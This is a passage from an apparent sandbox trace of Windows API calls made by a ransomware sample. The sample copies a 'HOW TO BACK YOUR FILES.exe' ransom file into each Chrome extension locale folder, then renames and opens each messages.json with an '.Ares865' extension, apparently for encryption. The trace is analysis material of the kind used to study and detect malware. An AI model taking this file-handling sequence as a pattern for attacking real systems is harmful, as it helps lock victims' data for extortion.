Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.973] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.973] GetLastError () returned 0x0 [0102.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f312f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed302a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed302a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.974] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.974] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.974] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.Ares865") returned 161 [0102.974] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.976] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0102.979] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv" [0102.979] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv" [0102.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.980] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.980] GetLastError () returned 0x0 [0102.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f312f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed56400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed56400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.981] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.981] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.Ares865") returned 161 [0102.981] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.982] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.983] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=258) returned 1 [0102.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt" [0102.986] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt" [0102.986] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.986] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.987] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.987] GetLastError () returned 0x0 [0102.987] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f312f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed56400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed56400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.987] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.987] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.Ares865") returned 161 [0102.987] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.989] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=285) returned 1 [0102.992] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko" [0102.992] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko" [0102.992] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.992] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.993] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.993] GetLastError () returned 0x0 [0102.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f0b190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed56400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed56400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.Ares865") returned 161 [0102.994] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.996] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=281) returned 1 [0102.999] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja" [0102.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja" [0102.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.000] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.000] GetLastError () returned 0x0 [0103.000] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f0b190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed56400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed56400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.000] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.000] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.001] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.Ares865") returned 161 [0103.001] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.002] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=293) returned 1 [0103.005] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it" [0103.005] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it" [0103.005] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.005] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.006] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.006] GetLastError () returned 0x0 [0103.007] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.007] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f0b190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed7c560, 